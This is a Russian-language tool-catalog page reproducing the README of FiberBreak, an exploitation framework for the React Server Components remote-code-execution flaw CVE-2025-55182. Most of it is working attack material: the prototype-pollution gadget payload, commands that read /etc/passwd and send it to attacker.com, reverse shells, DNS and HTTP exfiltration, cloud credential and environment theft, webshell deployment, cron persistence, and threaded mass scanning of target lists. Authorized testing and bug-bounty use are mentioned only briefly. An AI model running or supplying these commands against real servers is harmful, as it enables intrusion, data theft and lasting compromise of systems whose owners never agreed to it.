Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
FiberBreak — React2Shell Инструмент эксплуатации (CVE-2025-55182) | Kitploit
Инструменты/GitHubGitHub/scumfrog/fiberbreak
РазведкаСканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийЭксфильтрация данныхПост-эксплуатацияТестирование на ПроникновениеБезопасность облачных средКомандование и УправлениеRed TeamingРазработка Полезной Нагрузки
639 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
GitHubscumfrog/fiberbreak

FiberBreak

React2Shell Инструмент эксплуатации (CVE-2025-55182)

Репозиторий
Поделиться

FiberBreak

Фреймворк для эксплуатации CVE-2025-55182 (React2Shell) —
Критическая RCE-уязвимость в серверных компонентах React.

Обзор

  • CVE: CVE-2025-55182
  • CVSS: 10.0 (КРИТИЧЕСКАЯ)
  • Тип: Удаленное выполнение кода (RCE)
  • Затрагивает: React 19.0.0-rc.0 до 19.0.0, Next.js 15.0.0 до 15.0.3
  • Обнаружение: Lachlan Miller (SonarSource)
  • Публичный PoC: maple3142

Установка

# Клонирование репозитория
git clone https://github.com/scumfrog/fiberbreak
cd fiberbreak

# Установка зависимостей
pip install -r requirements.txt

# Сделать исполняемым
chmod +x fiberbreak.py

Быстрый старт

# Сборка уязвимой тестовой среды
docker-compose up -d

# Ожидание запуска
sleep 20

# Проверка обнаружения
./fiberbreak.py -u http://localhost:3000 detect

# Выполнение RCE
./fiberbreak.py -u http://localhost:3000 exploit -c "whoami"

# Проверка
docker exec react2shell-lab ls -la /tmp/

Технические детали

Обзор уязвимости

CVE-2025-55182 — критическая уязвимость удаленного выполнения кода в серверных компонентах React (RSC), которая позволяет неаутентифицированным злоумышленникам выполнять произвольный код на сервере.

Коренная причина: Протокол React Flight десериализует ненадежные входные данные от клиента без надлежащей проверки, что позволяет злоумышленникам создавать вредоносные нагрузки, злоупотребляющие цепочкой прототипов JavaScript и конструктором Function.

Вектор атаки: Злоумышленники отправляют специально сформированный POST-запрос multipart/form-data с заголовком Next-Action на любой RSC-эндпоинт. Вредоносная нагрузка использует:

  1. Загрязнение прототипа через доступ к __proto__
  2. Доступ к конструктору Function через constructor:constructor
  3. Разрешение Promise для запуска выполнения кода

Поток эксплуатации

1. Злоумышленник отправляет специально сформированный POST-запрос
   └─ multipart/form-data с вредоносным JSON
   └─ заголовок Next-Action (любое значение)

2. Сервер десериализует нагрузку
   └─ React обрабатывает формат чанка RSC
   └─ Разрешает объект, похожий на Promise

3. Цепочка гаджетов срабатывает
   └─ Доступ к __proto__ обходит проверки hasOwnProperty
   └─ constructor:constructor открывает доступ к Function()
   └─ _prefix выполняет произвольный код

4. RCE достигнуто
   └─ Сервер выполняет JavaScript злоумышленника
   └─ Полный компрометация системы

Гаджет

{
  "then": "$1:__proto__:then",           // Загрязнение прототипа
  "status": "resolved_model",            // Фейковое внутреннее состояние React
  "reason": -1,                          // Триггер разрешения
  "value": '{"then":"$B1337"}',         // Ссылка на Blob
  "_response": {
    "_prefix": "MALICIOUS_CODE_HERE;",   // Выполняемый код
    "_formData": {
      "get": "$1:constructor:constructor" // Доступ к Function()
    }
  }
}

Путь затронутого кода

// react-server-dom-webpack/src/ReactFlightClient.js
function resolveModelChunk(chunk) {
  const value = JSON.parse(chunk.value);
  
  // Отсутствие проверки здесь допускает вредоносные чанки
  if (value && typeof value.then === 'function') {
    // Злоумышленник контролирует метод 'then'
    value.then(/* ... */);
  }
}

Использование

Обнаружение уязвимости

# Обнаружение по одной цели
./fiberbreak.py -u https://target.com detect

# Несколько целей из файла
./fiberbreak.py -l targets.txt detect --threads 20

# Сохранение результатов в JSON
./fiberbreak.py -l targets.txt detect -o results.json

# Отключение проверки SSL
./fiberbreak.py -u https://target.com detect --no-verify-ssl

Базовая эксплуатация

# Простое слепое выполнение команды
./fiberbreak.py -u https://target.com exploit -c "whoami"

# Запись файла на диск
./fiberbreak.py -u https://target.com exploit \
  -c "/tmp/pwned.txt:HACKED" -t write_file

# Чтение содержимого файла
./fiberbreak.py -u https://target.com exploit \
  -c "/etc/passwd:https://attacker.com" -t file_read

Продвинутая эксплуатация

# Обратный шелл
./fiberbreak.py -u https://target.com exploit \
  -c "10.10.10.10:4444" -t reverse_shell

# DNS-эксфильтрация (скрытно, без HTTP-трафика)
./fiberbreak.py -u https://target.com exploit \
  -c "whoami:attacker.oastify.com" -t dns_exfil

# HTTP-эксфильтрация с выводом
./fiberbreak.py -u https://target.com exploit \
  -c "id:https://attacker.com/exfil" -t http_exfil

# Сбор переменных окружения
./fiberbreak.py -u https://target.com exploit \
  -c "https://attacker.com/env" -t env_dump

# Рекогносцировка системы
./fiberbreak.py -u https://target.com exploit \
  -c "https://attacker.com/recon" -t recon

# Скрытый DNS-маяк (без вывода команды)
./fiberbreak.py -u https://target.com exploit \
  -c "attacker.oastify.com" -t stealth_beacon

Облачная эксплуатация

# Автоматическое обнаружение облачного провайдера и извлечение учетных данных
# Поддерживает: AWS, GCP, Azure, DigitalOcean, Oracle Cloud, Alibaba Cloud
./fiberbreak.py -u https://target.com exploit \
  -c "https://attacker.com/cloud" -t cloud_metadata

Типы нагрузок

ТипФорматОписаниеВывод
simplecommandВыполнить любую команду оболочкиСлепой
outputcommand + --callbackВыполнение с HTTP-колбэкомДа
reverse_shelllhost:lportОбратный шелл BashИнтерактивный
dns_exfilcmd:domain или domainDNS-эксфильтрацияDNS-логи
http_exfilcmd:callback_urlHTTP-эксфильтрацияHTTP POST
file_readfilepath:callbackЧтение и эксфильтрация файлаHTTP POST
write_filefilepath:contentЗапись файла на дискСлепой
env_dumpcallback_urlСбор переменных окруженияHTTP POST
cloud_metadatacallback_urlИзвлечение облачных учетных данныхHTTP POST
reconcallback_urlРекогносцировка системыHTTP POST
stealth_beacondomainDNS-маякDNS-логи
webshellfilepathРазвертывание веб-шелла Node.jsПорт 8080
persistcallback_urlУстановка персистентности через cronCron-задача

Реальные сценарии

Bug Bounty охота

# 1. Скрытное обнаружение с DNS-маяком
./fiberbreak.py -u https://target.com exploit \
  -c "recon.yourburp.oastify.com" -t stealth_beacon

# 2. Если уязвимость подтверждена, извлечение чувствительных данных
./fiberbreak.py -u https://target.com exploit \
  -c "https://yourserver.com/exfil" -t env_dump

# 3. Проверка облачного окружения
./fiberbreak.py -u https://target.com exploit \
  -c "https://yourserver.com/cloud" -t cloud_metadata

# 4. Документирование результатов без причинения вреда

Тестирование на проникновение

# Фаза 1: Обнаружение
./fiberbreak.py -u https://target.com detect -o detection.json

# Фаза 2: Подтверждение
./fiberbreak.py -u https://target.com exploit \
  -c "/tmp/pentest_proof.txt:PENTEST_$(date +%s)" -t write_file

# Фаза 3: Оценка воздействия
./fiberbreak.py -u https://target.com exploit \
  -c "https://pentest-server.com/impact" -t recon

# Фаза 4: Извлечение учетных данных (если облачная среда)
./fiberbreak.py -u https://target.com exploit \
  -c "https://pentest-server.com/creds" -t cloud_metadata

# Фаза 5: Интерактивный доступ (если авторизовано)
# Терминал 1: Запуск слушателя
nc -lvnp 4444

# Терминал 2: Получение шелла
./fiberbreak.py -u https://target.com exploit \
  -c "YOUR_IP:4444" -t reverse_shell

Массовое сканирование уязвимостей

# Создание списка целей
cat > targets.txt << EOF
https://app1.company.com
https://app2.company.com
https://app3.company.com
https://api.company.com
EOF

# Сканирование всех целей параллельно
./fiberbreak.py -l targets.txt detect --threads 50 -o scan_results.json

# Фильтрация уязвимых целей
cat scan_results.json | jq '.[] | select(.vulnerable==true) | .url'
Скачать инструмент